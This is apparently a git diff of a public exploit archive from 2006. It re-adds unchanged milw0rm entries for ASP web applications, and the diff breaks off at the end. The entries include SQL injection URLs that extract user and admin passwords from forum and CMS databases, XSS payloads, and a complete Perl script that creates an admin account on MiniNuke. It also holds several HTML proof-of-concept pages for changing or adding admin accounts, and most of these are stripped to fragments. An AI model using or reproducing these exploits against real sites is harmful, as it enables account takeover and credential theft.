+### http://[target]/[path]/topics.asp?catid=1'SQL TEXT =>catid=x
+
+Example:
+http://[target]/[path]/topics.asp?catid=1 union+select+0,password,0,0,0,0,0,0,0,0+from+tbl_forum_users
+
+XSS--------------------------------------------------------
+### http://[target]/[path]/userview.asp?startletter=xss TEXT
+### http://[target]/[path]/topics.asp?catid=30&forumname=XSS TEXT
+
+Example:
+http://[target]/[path]/topics.asp?catid=30&forumname=%22%3E%3Cscript%3Ealert%28%27X%27%29%3B%3C%2Fscript%3E%22%3E%3Cscript%3Ealert%28%27X%27%29%3B%3C%2Fscript%3E == X
+
+
+
+
+TURKISH
+# Ba.l.k : Easy-Content Forums 1.0 Multiple SQL/XSS Vulnerabilities
+# Sözcük[Arama] : "powered by phpmydirectory"
+# Aç... Bulan : ajann
+# Aç.k bulunan dosyalar;
+
+SQL INJECT.ON--------------------------------------------------------
+### http://[target]/[path]/userview.asp?startletter=SQL SORGUNUZ
+### http://[target]/[path]/topics.asp?catid=1'SQL SORGUNUZ =>catid=De.i.ken
+
+Örnek:
+http://[target]/[path]/topics.asp?catid=1 union+select+0,password,0,0,0,0,0,0,0,0+from+tbl_forum_users
+
+XSS--------------------------------------------------------
+
+### http://[target]/[path]/userview.asp?startletter=XSS KODLARINIZ
+### http://[target]/[path]/topics.asp?catid=30&forumname=XSS KODLARINIZ
+
+Örnek:
+http://[target]/[path]/topics.asp?catid=30&forumname=%22%3E%3Cscript%3Ealert%28%27X%27%29%3B%3C%2Fscript%3E%22%3E%3Cscript%3Ealert%28%27X%27%29%3B%3C%2Fscript%3E Ekrana X uyar.s. c.kar.cakt.r.
+
+Ac.klama:
+userview.asp , topics.asp dosyalar.nda bulunan filtreleme eksikli.i nedeniyle sql sorgu cal.st.r.labilmektedir.
+userview.asp , topics.asp dosyalar.nda bulunan filtreleme eksikli.i nedeniyle xss kodlar. cal.sabilmektedir.
+
+# milw0rm.com [2006-05-26]
diff --git a/platforms/asp/webapps/1836.txt b/platforms/asp/webapps/1836.txt
index 4fe21b45c..89fbe5b1b 100755
--- a/platforms/asp/webapps/1836.txt
+++ b/platforms/asp/webapps/1836.txt
@@ -1,7 +1,7 @@
-# Title : PrideForum 1.0 (forum.asp) Remote SQL Injection Vulnerability
-# Author : ajann
-
-# Exploit Example:
-http://[target]/[path]/forum.asp?H_ID=1%20union+select+0,0,ID,J_User,0,0,0,J_Pass,ID,0+from+adminlogins+where+ID=1&Name=Allm%E4nt
-
-# milw0rm.com [2006-05-27]
+# Title : PrideForum 1.0 (forum.asp) Remote SQL Injection Vulnerability
+# Author : ajann
+
+# Exploit Example:
+http://[target]/[path]/forum.asp?H_ID=1%20union+select+0,0,ID,J_User,0,0,0,J_Pass,ID,0+from+adminlogins+where+ID=1&Name=Allm%E4nt
+
+# milw0rm.com [2006-05-27]
diff --git a/platforms/asp/webapps/1837.pl b/platforms/asp/webapps/1837.pl
index ac1541c77..a1127c9d5 100755
--- a/platforms/asp/webapps/1837.pl
+++ b/platforms/asp/webapps/1837.pl
@@ -1,204 +1,204 @@ -#!/usr/bin/perl -#Method found & Exploit scripted by nukedx -#Contacts > ICQ: 10072 MSN/Main: nukedx@nukedx.com web: www.nukedx.com -#Original advisory: http://www.nukedx.com/?viewdoc=31 -#Usage: mini.pl -use IO::Socket; -if(@ARGV != 5) { usage(); } -else { exploit(); } -sub header() -{ - print "\n- NukedX Security Advisory Nr.2006-31\r\n"; - print "- MiniNuke v2.x Remote SQL Injection (create an admin) Exploit\r\n"; -} -sub usage() -{ - header(); - print "- Usage: $0 \r\n"; - print "- -> Victim's host ex: www.victim.com\r\n"; - print "- -> Path to MiniNuke ex: /mininuke/\r\n"; - print "- -> Desired username to create ex: h4x0r\r\n"; - print "- -> Password for our username ex: p4ZZw0rd\r\n"; - print "- -> Mail for our username ex: hax0r\@s3x0r3d.com\r\n"; - exit(); -} -sub exploit () -{ - #Our variables... - $mnserver = $ARGV[0]; - $mnserver =~ s/(http:\/\/)//eg; - $mnhost = "http://".$mnserver; - $mndir = $ARGV[1]; - $mnuser = $ARGV[2]; - $mnpass = $ARGV[3]; - $mnmail = $ARGV[4]; - $mnport = "80"; - #Sending data... - header(); - print "- Trying to connect: $mnserver\r\n"; - getsession(); -} -sub getsession () -{ - print "- Getting session for register...\r\n"; - $mnstar = "membership.asp?action=new"; - $mnsreq = $mnhost.$mndir.$mnstar; - $mns = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$mnserver", PeerPort => "$mnport") || die "- Connection failed...\r\n"; - print $mns "GET $mnsreq HTTP/1.1\n"; - print $mns "Accept: */*\n"; - print $mns "Referer: $mnhost\n"; - print $mns "Accept-Language: tr\n"; - print $mns "User-Agent: NukeZilla\n"; - print $mns "Cache-Control: no-cache\n"; - print $mns "Host: $mnserver\n"; - print $mns "Connection: close\n\n"; - print "- Connected...\r\n"; - while ($answer = <$mns>) { - if ($answer =~ /Set-Cookie: (.*?) path=\//) { $mncookie = $mncookie.$1; } - if ($answer =~ /Güvenlik Kodunuz<\/td>(.*?)<\/b><\/td>/) { $mngvn=$1;doregister(); } - } - #if you are here... 
- die "- Exploit failed\r\n"; -} -sub doregister () -{ - close($mns); - $mntar = "membership.asp?action=register"; - $mnreq = $mnhost.$mndir.$mntar; - print "- Session getting done\r\n"; - print "- Lets create our user...\r\n"; - $mndata = "kuladi=".$mnuser; - $mndata.= "&password=".$mnpass; - $mndata.= "&email=".$mnmail; - $mndata.= "&isim=h4x0r"; - $mndata.= "&g_soru=whooooo"; - $mndata.= "&g_cevap=h4x0rs"; - $mndata.= "&icq=1"; - $mndata.= "&msn=1"; - $mndata.= "&aim=1"; - $mndata.= "&sehir=1"; - $mndata.= "&meslek=1"; - $mndata.= "&cinsiyet=b"; - $mndata.= "&yas_1=1"; - $mndata.= "&yas_2=1"; - $mndata.= "&yas_3=1920"; - $mndata.= "&web=http://www.milw0rm.com"; - $mndata.= "&imza=h4x0r"; - $mndata.= "&mavatar=IMAGES/avatars/1.gif"; - $mndata.= "&security_code=".$mngvn; - $mndata.= "&mail_goster=on"; - $mndatalen = length($mndata); - $mn = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$mnserver", PeerPort => "$mnport") || die "- Connection failed...\r\n"; - print $mn "POST $mnreq HTTP/1.1\r\n"; - print $mn "Accept: */*\r\n"; - print $mn "Referer: $mnhost\r\n"; - print $mn "Accept-Language: tr\r\n"; - print $mn "Content-Type: application/x-www-form-urlencoded\r\n"; - print $mn "Accept-Encoding: gzip, deflate\r\n"; - print $mn "User-Agent: NukeZilla\r\n"; - print $mn "Cookie: $mncookie\r\n"; - print $mn "Host: $mnserver\r\n"; - print $mn "Content-length: $mndatalen\r\n"; - print $mn "Connection: Keep-Alive\r\n"; - print $mn "Cache-Control: no-cache\r\n\r\n"; - print $mn $mndata; - print $mn "\r\n\r\n"; - while ($answer = <$mn>) { - if ($answer =~ /Tebrikler !!!/) { - print "- Creating user has been done...\r\n"; - print "- Loginning in to user...\r\n"; - dologin(); - } - } - #if you are here... 
- die "- Exploit failed\r\n"; -} -sub dologin () -{ - close ($mn); - $mnltar = "enter.asp"; - $mnlreq = $mnhost.$mndir.$mnltar; - $mnldata = "kuladi=".$mnuser; - $mnldata.= "&password=".$mnpass; - $mnldata.= "&guvenlik=423412"; - $mnldata.= "&gguvenlik=423412"; - $mnldatalen = length($mnldata); - $mnl = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$mnserver", PeerPort => "$mnport") || die "- Connection failed...\r\n"; - print $mnl "POST $mnlreq HTTP/1.1\r\n"; - print $mnl "Accept: */*\r\n"; - print $mnl "Referer: $mnhost\r\n"; - print $mnl "Accept-Language: tr\r\n"; - print $mnl "Content-Type: application/x-www-form-urlencoded\r\n"; - print $mnl "Accept-Encoding: gzip, deflate\r\n"; - print $mnl "User-Agent: NukeZilla\r\n"; - print $mnl "Host: $mnserver\r\n"; - print $mnl "Content-length: $mnldatalen\r\n"; - print $mnl "Connection: Keep-Alive\r\n"; - print $mnl "Cache-Control: no-cache\r\n\r\n"; - print $mnl $mnldata; - print $mnl "\r\n\r\n"; - while ($answer = <$mnl>) { - if ($answer =~ /Set-Cookie: (.*?) path=\//) { $mnlcookie = $mnlcookie.$1; } - if ($answer =~ /Cache-control:/) { doadmin(); } - } - #if you are here... 
- die "- Exploit failed\r\n";
-}
-sub doadmin ()
-{
- close($mnl);
- print "- Editing profile..\r\n";
- $mnptar = "Your_Account.asp?op=UpdateProfile";
- $mnpreq = $mnhost.$mndir.$mnptar;
- $mnpdata.= "email=".$mnmail;
- $mnpdata.= "&isim=h4x0r";
- $mnpdata.= "&g_soru=whooooo";
- $mnpdata.= "&g_cevap=h4x0rs";
- $mnpdata.= "&icq=1";
- $mnpdata.= "&msn=1";
- $mnpdata.= "&aim=1";
- $mnpdata.= "&sehir=1";
- $mnpdata.= "&meslek=1";
- $mnpdata.= "&cinsiyet=b";
- $mnpdata.= "&yas_1=1";
- $mnpdata.= "&yas_2=1";
- $mnpdata.= "&yas_3=1920',seviye='1";
- $mnpdata.= "&web=http://www.milw0rm.com";
- $mnpdata.= "&imza=h4x0r";
- $mnpdata.= "&mavatar=IMAGES/avatars/1.gif";
- $mnpdata.= "&mail_goster=on";
- $mnpdatalen = length($mnpdata);
- $mnp = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$mnserver", PeerPort => "$mnport") || die "- Connection failed...\r\n";
- print $mnp "POST $mnpreq HTTP/1.1\r\n";
- print $mnp "Accept: */*\r\n";
- print $mnp "Referer: $mnhost\r\n";
- print $mnp "Accept-Language: tr\r\n";
- print $mnp "Content-Type: application/x-www-form-urlencoded\r\n";
- print $mnp "Accept-Encoding: gzip, deflate\r\n";
- print $mnp "User-Agent: NukeZilla\r\n";
- print $mnp "Cookie: $mnlcookie\r\n";
- print $mnp "Host: $mnserver\r\n";
- print $mnp "Content-length: $mnpdatalen\r\n";
- print $mnp "Connection: Keep-Alive\r\n";
- print $mnp "Cache-Control: no-cache\r\n\r\n";
- print $mnp $mnpdata;
- print $mn "\r\n\r\n";
- while ($answer = <$mnp>) {
- if ($answer =~ /Tebrikler !!!/) {
- print "- Editing profile been done...\r\n";
- print "- Exploiting finished succesfully\r\n";
- print "- Your username $mnuser has been created as admin\r\n";
- print "- You can login with password $mnpass on $mnlreq\r\n";
- exit();
- }
- if ($answer =~ /Üyeler Açýktýr/) {
- print "- Exploit failed\r\n";
- exit();
- }
- }
- #if you are here...
- die "- Exploit failed\r\n";
-}
-# nukedx.com [2006-05-27]
-
-# milw0rm.com [2006-05-27]
+#!/usr/bin/perl
+#Method found & Exploit scripted by nukedx
+#Contacts > ICQ: 10072 MSN/Main: nukedx@nukedx.com web: www.nukedx.com
+#Original advisory: http://www.nukedx.com/?viewdoc=31
+#Usage: mini.pl
+use IO::Socket;
+if(@ARGV != 5) { usage(); }
+else { exploit(); }
+sub header()
+{
+ print "\n- NukedX Security Advisory Nr.2006-31\r\n";
+ print "- MiniNuke v2.x Remote SQL Injection (create an admin) Exploit\r\n";
+}
+sub usage()
+{
+ header();
+ print "- Usage: $0 \r\n";
+ print "- -> Victim's host ex: www.victim.com\r\n";
+ print "- -> Path to MiniNuke ex: /mininuke/\r\n";
+ print "- -> Desired username to create ex: h4x0r\r\n";
+ print "- -> Password for our username ex: p4ZZw0rd\r\n";
+ print "- -> Mail for our username ex: hax0r\@s3x0r3d.com\r\n";
+ exit();
+}
+sub exploit ()
+{
+ #Our variables...
+ $mnserver = $ARGV[0];
+ $mnserver =~ s/(http:\/\/)//eg;
+ $mnhost = "http://".$mnserver;
+ $mndir = $ARGV[1];
+ $mnuser = $ARGV[2];
+ $mnpass = $ARGV[3];
+ $mnmail = $ARGV[4];
+ $mnport = "80";
+ #Sending data...
+ header();
+ print "- Trying to connect: $mnserver\r\n";
+ getsession();
+}
+sub getsession ()
+{
+ print "- Getting session for register...\r\n";
+ $mnstar = "membership.asp?action=new";
+ $mnsreq = $mnhost.$mndir.$mnstar;
+ $mns = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$mnserver", PeerPort => "$mnport") || die "- Connection failed...\r\n";
+ print $mns "GET $mnsreq HTTP/1.1\n";
+ print $mns "Accept: */*\n";
+ print $mns "Referer: $mnhost\n";
+ print $mns "Accept-Language: tr\n";
+ print $mns "User-Agent: NukeZilla\n";
+ print $mns "Cache-Control: no-cache\n";
+ print $mns "Host: $mnserver\n";
+ print $mns "Connection: close\n\n";
+ print "- Connected...\r\n";
+ while ($answer = <$mns>) {
+ if ($answer =~ /Set-Cookie: (.*?) 
path=\//) { $mncookie = $mncookie.$1; }
+ if ($answer =~ /Güvenlik Kodunuz<\/td>(.*?)<\/b><\/td>/) { $mngvn=$1;doregister(); }
+ }
+ #if you are here...
+ die "- Exploit failed\r\n";
+}
+sub doregister ()
+{
+ close($mns);
+ $mntar = "membership.asp?action=register";
+ $mnreq = $mnhost.$mndir.$mntar;
+ print "- Session getting done\r\n";
+ print "- Lets create our user...\r\n";
+ $mndata = "kuladi=".$mnuser;
+ $mndata.= "&password=".$mnpass;
+ $mndata.= "&email=".$mnmail;
+ $mndata.= "&isim=h4x0r";
+ $mndata.= "&g_soru=whooooo";
+ $mndata.= "&g_cevap=h4x0rs";
+ $mndata.= "&icq=1";
+ $mndata.= "&msn=1";
+ $mndata.= "&aim=1";
+ $mndata.= "&sehir=1";
+ $mndata.= "&meslek=1";
+ $mndata.= "&cinsiyet=b";
+ $mndata.= "&yas_1=1";
+ $mndata.= "&yas_2=1";
+ $mndata.= "&yas_3=1920";
+ $mndata.= "&web=http://www.milw0rm.com";
+ $mndata.= "&imza=h4x0r";
+ $mndata.= "&mavatar=IMAGES/avatars/1.gif";
+ $mndata.= "&security_code=".$mngvn;
+ $mndata.= "&mail_goster=on";
+ $mndatalen = length($mndata);
+ $mn = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$mnserver", PeerPort => "$mnport") || die "- Connection failed...\r\n";
+ print $mn "POST $mnreq HTTP/1.1\r\n";
+ print $mn "Accept: */*\r\n";
+ print $mn "Referer: $mnhost\r\n";
+ print $mn "Accept-Language: tr\r\n";
+ print $mn "Content-Type: application/x-www-form-urlencoded\r\n";
+ print $mn "Accept-Encoding: gzip, deflate\r\n";
+ print $mn "User-Agent: NukeZilla\r\n";
+ print $mn "Cookie: $mncookie\r\n";
+ print $mn "Host: $mnserver\r\n";
+ print $mn "Content-length: $mndatalen\r\n";
+ print $mn "Connection: Keep-Alive\r\n";
+ print $mn "Cache-Control: no-cache\r\n\r\n";
+ print $mn $mndata;
+ print $mn "\r\n\r\n";
+ while ($answer = <$mn>) {
+ if ($answer =~ /Tebrikler !!!/) {
+ print "- Creating user has been done...\r\n";
+ print "- Loginning in to user...\r\n";
+ dologin();
+ }
+ }
+ #if you are here...
+ die "- Exploit failed\r\n";
+}
+sub dologin ()
+{
+ close ($mn);
+ $mnltar = "enter.asp";
+ $mnlreq = $mnhost.$mndir.$mnltar;
+ $mnldata = "kuladi=".$mnuser;
+ $mnldata.= "&password=".$mnpass;
+ $mnldata.= "&guvenlik=423412";
+ $mnldata.= "&gguvenlik=423412";
+ $mnldatalen = length($mnldata);
+ $mnl = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$mnserver", PeerPort => "$mnport") || die "- Connection failed...\r\n";
+ print $mnl "POST $mnlreq HTTP/1.1\r\n";
+ print $mnl "Accept: */*\r\n";
+ print $mnl "Referer: $mnhost\r\n";
+ print $mnl "Accept-Language: tr\r\n";
+ print $mnl "Content-Type: application/x-www-form-urlencoded\r\n";
+ print $mnl "Accept-Encoding: gzip, deflate\r\n";
+ print $mnl "User-Agent: NukeZilla\r\n";
+ print $mnl "Host: $mnserver\r\n";
+ print $mnl "Content-length: $mnldatalen\r\n";
+ print $mnl "Connection: Keep-Alive\r\n";
+ print $mnl "Cache-Control: no-cache\r\n\r\n";
+ print $mnl $mnldata;
+ print $mnl "\r\n\r\n";
+ while ($answer = <$mnl>) {
+ if ($answer =~ /Set-Cookie: (.*?) path=\//) { $mnlcookie = $mnlcookie.$1; }
+ if ($answer =~ /Cache-control:/) { doadmin(); }
+ }
+ #if you are here...
+ die "- Exploit failed\r\n";
+}
+sub doadmin ()
+{
+ close($mnl);
+ print "- Editing profile..\r\n";
+ $mnptar = "Your_Account.asp?op=UpdateProfile";
+ $mnpreq = $mnhost.$mndir.$mnptar;
+ $mnpdata.= "email=".$mnmail;
+ $mnpdata.= "&isim=h4x0r";
+ $mnpdata.= "&g_soru=whooooo";
+ $mnpdata.= "&g_cevap=h4x0rs";
+ $mnpdata.= "&icq=1";
+ $mnpdata.= "&msn=1";
+ $mnpdata.= "&aim=1";
+ $mnpdata.= "&sehir=1";
+ $mnpdata.= "&meslek=1";
+ $mnpdata.= "&cinsiyet=b";
+ $mnpdata.= "&yas_1=1";
+ $mnpdata.= "&yas_2=1";
+ $mnpdata.= "&yas_3=1920',seviye='1";
+ $mnpdata.= "&web=http://www.milw0rm.com";
+ $mnpdata.= "&imza=h4x0r";
+ $mnpdata.= "&mavatar=IMAGES/avatars/1.gif";
+ $mnpdata.= "&mail_goster=on";
+ $mnpdatalen = length($mnpdata);
+ $mnp = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$mnserver", PeerPort => "$mnport") || die "- Connection failed...\r\n";
+ print $mnp "POST $mnpreq HTTP/1.1\r\n";
+ print $mnp "Accept: */*\r\n";
+ print $mnp "Referer: $mnhost\r\n";
+ print $mnp "Accept-Language: tr\r\n";
+ print $mnp "Content-Type: application/x-www-form-urlencoded\r\n";
+ print $mnp "Accept-Encoding: gzip, deflate\r\n";
+ print $mnp "User-Agent: NukeZilla\r\n";
+ print $mnp "Cookie: $mnlcookie\r\n";
+ print $mnp "Host: $mnserver\r\n";
+ print $mnp "Content-length: $mnpdatalen\r\n";
+ print $mnp "Connection: Keep-Alive\r\n";
+ print $mnp "Cache-Control: no-cache\r\n\r\n";
+ print $mnp $mnpdata;
+ print $mn "\r\n\r\n";
+ while ($answer = <$mnp>) {
+ if ($answer =~ /Tebrikler !!!/) {
+ print "- Editing profile been done...\r\n";
+ print "- Exploiting finished succesfully\r\n";
+ print "- Your username $mnuser has been created as admin\r\n";
+ print "- You can login with password $mnpass on $mnlreq\r\n";
+ exit();
+ }
+ if ($answer =~ /Üyeler Açýktýr/) {
+ print "- Exploit failed\r\n";
+ exit();
+ }
+ }
+ #if you are here...
+ die "- Exploit failed\r\n";
+}
+# nukedx.com [2006-05-27]
+
+# milw0rm.com [2006-05-27]
diff --git a/platforms/asp/webapps/1840.txt b/platforms/asp/webapps/1840.txt
index 2543a5b5d..ff103a94d 100755
--- a/platforms/asp/webapps/1840.txt
+++ b/platforms/asp/webapps/1840.txt
@@ -1,25 +1,25 @@
-Enigma Haber <= 4.3 Multiple Remote SQL Injection Vulnerabilities
-Contacts > ICQ: 10072 MSN/Mail: nukedx@nukedx.com web: www.nukedx.com
-This exploits works on Enigma Haber <= 4.3
-Original advisory can be found at: http://www.nukedx.com/?viewdoc=34
-http://[site]/enigmadir/e_mesaj_yaz.asp?id=1879586820+UNION+SELECT+0,sifre,2,3,4,5,6,7,8,9,10,110,0,0,0,0,0,0,0,0,0,0,0,0,0,0+FROM+yonet+where+yonetid=1144931586
-http://[site]/enigmadir/yazdir.asp?hid=SQL
-http://[site]/enigmadir/yorum.asp?hid=SQL
-http://[site]/enigmadir/edi_haber.asp?id=SQL&tur=1
-http://[site]/enigmadir/ara.asp?yo=1&ara=SQL&ko=0&k=0&d=hid&e=desc&ay=00&yil=00
-http://[site]/enigmadir/arsiv.asp?d=hid&e=desc+UNION+SELECT+0,sifre,isim,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+FROM+yonet+where+yonetid%20like%201144927664&ay=00&yil=00&e_kad=00
-http://[site]/enigmadir/haber_devam.asp?id=SQL
-Examples in the below needs admin rights.
-http://[site]/enigmadir/admin/y_admin.asp?yid=SQL
-http://[site]/enigmadir/admin/y_admin.asp?yid=34+UNION+SELECT+0,1,mail,3,4,5,sifre,isim,8,9,sehir+from+yonet+where+yonetid=1144927664
-http://[site]/enigmadir/admin/reklam_detay.asp?bid=SQL
-http://[site]/enigmadir/admin/detay_yorum.asp?hid=SQL
-http://[site]/enigmadir/admin/haber_sil.asp?hid=SQL
-http://[site]/enigmadir/admin/kategori_d.asp?o=1&kid=SQL
-http://[site]/enigmadir/admin/haber_ekle.asp?tur=SQL
-http://[site]/enigmadir/admin/e_mesaj_yaz.asp?s=SQL
-http://[site]/enigmadir/admin/admin_sil.asp?id=SQL
-
-# nukedx.com [2006-05-27]
-
-# milw0rm.com [2006-05-28]
+Enigma Haber <= 4.3 Multiple Remote SQL Injection Vulnerabilities
+Contacts > ICQ: 10072 MSN/Mail: nukedx@nukedx.com web: www.nukedx.com
+This exploits works on Enigma Haber <= 4.3
+Original advisory can be found at: http://www.nukedx.com/?viewdoc=34
+http://[site]/enigmadir/e_mesaj_yaz.asp?id=1879586820+UNION+SELECT+0,sifre,2,3,4,5,6,7,8,9,10,110,0,0,0,0,0,0,0,0,0,0,0,0,0,0+FROM+yonet+where+yonetid=1144931586
+http://[site]/enigmadir/yazdir.asp?hid=SQL
+http://[site]/enigmadir/yorum.asp?hid=SQL
+http://[site]/enigmadir/edi_haber.asp?id=SQL&tur=1
+http://[site]/enigmadir/ara.asp?yo=1&ara=SQL&ko=0&k=0&d=hid&e=desc&ay=00&yil=00
+http://[site]/enigmadir/arsiv.asp?d=hid&e=desc+UNION+SELECT+0,sifre,isim,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+FROM+yonet+where+yonetid%20like%201144927664&ay=00&yil=00&e_kad=00
+http://[site]/enigmadir/haber_devam.asp?id=SQL
+Examples in the below needs admin rights.
+http://[site]/enigmadir/admin/y_admin.asp?yid=SQL
+http://[site]/enigmadir/admin/y_admin.asp?yid=34+UNION+SELECT+0,1,mail,3,4,5,sifre,isim,8,9,sehir+from+yonet+where+yonetid=1144927664
+http://[site]/enigmadir/admin/reklam_detay.asp?bid=SQL
+http://[site]/enigmadir/admin/detay_yorum.asp?hid=SQL
+http://[site]/enigmadir/admin/haber_sil.asp?hid=SQL
+http://[site]/enigmadir/admin/kategori_d.asp?o=1&kid=SQL
+http://[site]/enigmadir/admin/haber_ekle.asp?tur=SQL
+http://[site]/enigmadir/admin/e_mesaj_yaz.asp?s=SQL
+http://[site]/enigmadir/admin/admin_sil.asp?id=SQL
+
+# nukedx.com [2006-05-27]
+
+# milw0rm.com [2006-05-28]
diff --git a/platforms/asp/webapps/1845.txt b/platforms/asp/webapps/1845.txt
index b9baea21c..914bbc0f5 100755
--- a/platforms/asp/webapps/1845.txt
+++ b/platforms/asp/webapps/1845.txt
@@ -1,15 +1,15 @@ -ASPSitem <= 2.0 Multiple Vulnerabilities. -Contacts > ICQ: 10072 MSN/Mail: nukedx@nukedx.com web: www.nukedx.com -This exploits works on ASPSitem <= 2.0. -Original advisory can be found at: http://www.nukedx.com/?viewdoc=39 -SQL injection -> -GET -> http://[victim]/[ASPSitemDir]/Anket.asp?hid=[SQL] -EXAMPLE -> http://[victim]/[ASPSitemDir]/Anket.asp?hid=4%20union%20select%20sifre,0%20from%20uyeler%20where%20 -id%20like%201 -with this example remote attacker can leak userid 1's login information from database. -Read others private messages -> -GET/EXAMPLE -> http://[victim]/[ASPSitemDir]/Hesabim.asp?mesaj=oku&id=1&uye=yourusername - -# nukedx.com [2006-05-27] - -# milw0rm.com [2006-05-28] +ASPSitem <= 2.0 Multiple Vulnerabilities. +Contacts > ICQ: 10072 MSN/Mail: nukedx@nukedx.com web: www.nukedx.com +This exploits works on ASPSitem <= 2.0. +Original advisory can be found at: http://www.nukedx.com/?viewdoc=39 +SQL injection -> +GET -> http://[victim]/[ASPSitemDir]/Anket.asp?hid=[SQL] +EXAMPLE -> http://[victim]/[ASPSitemDir]/Anket.asp?hid=4%20union%20select%20sifre,0%20from%20uyeler%20where%20 +id%20like%201 +with this example remote attacker can leak userid 1's login information from database. +Read others private messages -> +GET/EXAMPLE -> http://[victim]/[ASPSitemDir]/Hesabim.asp?mesaj=oku&id=1&uye=yourusername + +# nukedx.com [2006-05-27] + +# milw0rm.com [2006-05-28] diff --git a/platforms/asp/webapps/1849.htm b/platforms/asp/webapps/1849.htm index 079583459..303ca922f 100755 --- a/platforms/asp/webapps/1849.htm +++ b/platforms/asp/webapps/1849.htm @@ -1,69 +1,69 @@ - - -

-
-Speedy Forum User Pass Change // -ajann

User -Name -: - - Example: Surname -Name
-User -Mail -: - - Example: -mail@domain.com
- -User -Ýd -: - - Example: Ýd:1 -Admin
-User Country : - - - Example: -Turkey
- - - -User -Pass - -: - - - Example: 123456
- -User -RePass -: - - - Example: 123456
- -Form Action : - - - - - Example: -http://[target]/[path]/profileupdate.asp

- -

- -

- -
- -
- -
- -# milw0rm.com [2006-05-29] + + +
+
+Speedy Forum User Pass Change // +ajann

User +Name +: + + Example: Surname +Name
+User +Mail +: + + Example: +mail@domain.com
+ +User +Ýd +: + + Example: Ýd:1 +Admin
+User Country : + + + Example: +Turkey
+ + + +User +Pass + +: + + + Example: 123456
+ +User +RePass +: + + + Example: 123456
+ +Form Action : + + + + + Example: +http://[target]/[path]/profileupdate.asp

+ +

+ +

+ +
+ +
+ +
+ +# milw0rm.com [2006-05-29] diff --git a/platforms/asp/webapps/1850.htm b/platforms/asp/webapps/1850.htm index 588b830cc..97f64c30e 100755 --- a/platforms/asp/webapps/1850.htm +++ b/platforms/asp/webapps/1850.htm @@ -1,43 +1,43 @@ -################ KAPDA - Security Science Researchers Institute ################# -#Advisory : http://www.kapda.ir/advisory-337.html -#Vendor : http://www.nukedit.com/ -#What is : Nukedit is a Free Content Management -#Vulnerability : Unauthorized Admin Add Exploit if "register.asp" be enable! -#Discovered : 3nitro - farhadkey {AT} kapda [d0t] ir -#Vulnerabale versions : <= 4.9.6 -#Grtz to : Irannetjob.com, Maskofgod.net, Hamid.ir, ihsteam.com, simorhg-ev.com, hat-squad.com -#Solution : update to new version of nukedit . -#Change "http://victim.com/nukedit/utilities/register.asp" -################ KAPDA - Security Science Researchers Institute ################# - -Kapda HTML PoC For Nukedit <= 4.9.6 - - -
-Kapda HTML PoC For Nukedit <= 4.9.6 (With Security Patch) Unauthorized Admin Add Exploit
-Discovered and coded by 3nitro - farhadkey {AT} kapda [dot] ir
-Change the form's action in source : "http://victim.com/nukedit/utilities/register.asp"
-Fill the blank and submit . After that login with your email ! + your password .

-

-

-


Username : - - - - - - - - -


Your E-mail : -


Your Password : - - -



- -
-
- - - -# milw0rm.com [2006-05-29] +################ KAPDA - Security Science Researchers Institute ################# +#Advisory : http://www.kapda.ir/advisory-337.html +#Vendor : http://www.nukedit.com/ +#What is : Nukedit is a Free Content Management +#Vulnerability : Unauthorized Admin Add Exploit if "register.asp" be enable! +#Discovered : 3nitro - farhadkey {AT} kapda [d0t] ir +#Vulnerabale versions : <= 4.9.6 +#Grtz to : Irannetjob.com, Maskofgod.net, Hamid.ir, ihsteam.com, simorhg-ev.com, hat-squad.com +#Solution : update to new version of nukedit . +#Change "http://victim.com/nukedit/utilities/register.asp" +################ KAPDA - Security Science Researchers Institute ################# + +Kapda HTML PoC For Nukedit <= 4.9.6 + + +
+Kapda HTML PoC For Nukedit <= 4.9.6 (With Security Patch) Unauthorized Admin Add Exploit
+Discovered and coded by 3nitro - farhadkey {AT} kapda [dot] ir
+Change the form's action in source : "http://victim.com/nukedit/utilities/register.asp"
+Fill the blank and submit . After that login with your email ! + your password .

+

+

+


Username : + + + + + + + + +


Your E-mail : +


Your Password : + + +



+ +
+
+ + + +# milw0rm.com [2006-05-29] diff --git a/platforms/asp/webapps/1859.htm b/platforms/asp/webapps/1859.htm index cb981fdf2..a33e4d4a4 100755 --- a/platforms/asp/webapps/1859.htm +++ b/platforms/asp/webapps/1859.htm @@ -1,79 +1,79 @@ - - - -AspWebLink 2.0 Remote Admin Pass Change Exploit -
Administrative -Password:
Number of Days -New:
Number of Visits Hot:
Links Per Page:
Category Header:
Category -Columns:
Sub -Category Header:
Show Category -Description:YESNO
Show Whats New on -home page:YESNO
Number of New -items on home page:
Show Whats Hot on home page:YESNO
Require approval for link and review -additions:YESNO
Number of Hot -items on home page:
Whats New Header:
Whats Hot Header:
Sort Links -By:
- -# milw0rm.com [2006-06-01] + + + +AspWebLink 2.0 Remote Admin Pass Change Exploit +
Administrative +Password:
Number of Days +New:
Number of Visits Hot:
Links Per Page:
Category Header:
Category +Columns:
Sub +Category Header:
Show Category +Description:YESNO
Show Whats New on +home page:YESNO
Number of New +items on home page:
Show Whats Hot on home page:YESNO
Require approval for link and review +additions:YESNO
Number of Hot +items on home page:
Whats New Header:
Whats Hot Header:
Sort Links +By:
+
+# milw0rm.com [2006-06-01]
diff --git a/platforms/asp/webapps/1873.txt b/platforms/asp/webapps/1873.txt
index 3d628ea16..a5918b9ed 100755
--- a/platforms/asp/webapps/1873.txt
+++ b/platforms/asp/webapps/1873.txt
@@ -1,8 +1,8 @@
-# ProPublish 2.0 (catid) Remote SQL Injection Vulnerability
-# Thanks to soot : http://www.securityfocus.com/archive/1/435787/30/0/threaded
-# Exploited by FarhadKey from kapda.ir
-
-Exploit :
-http://[site]/[propublish]/cat.php?catid=-1%20union%20select%201,1,email,1,1,null,1,password,9%20from%20author_news%20/*&catname=CTE
-
-# milw0rm.com [2006-06-03]
+# ProPublish 2.0 (catid) Remote SQL Injection Vulnerability
+# Thanks to soot : http://www.securityfocus.com/archive/1/435787/30/0/threaded
+# Exploited by FarhadKey from kapda.ir
+
+Exploit :
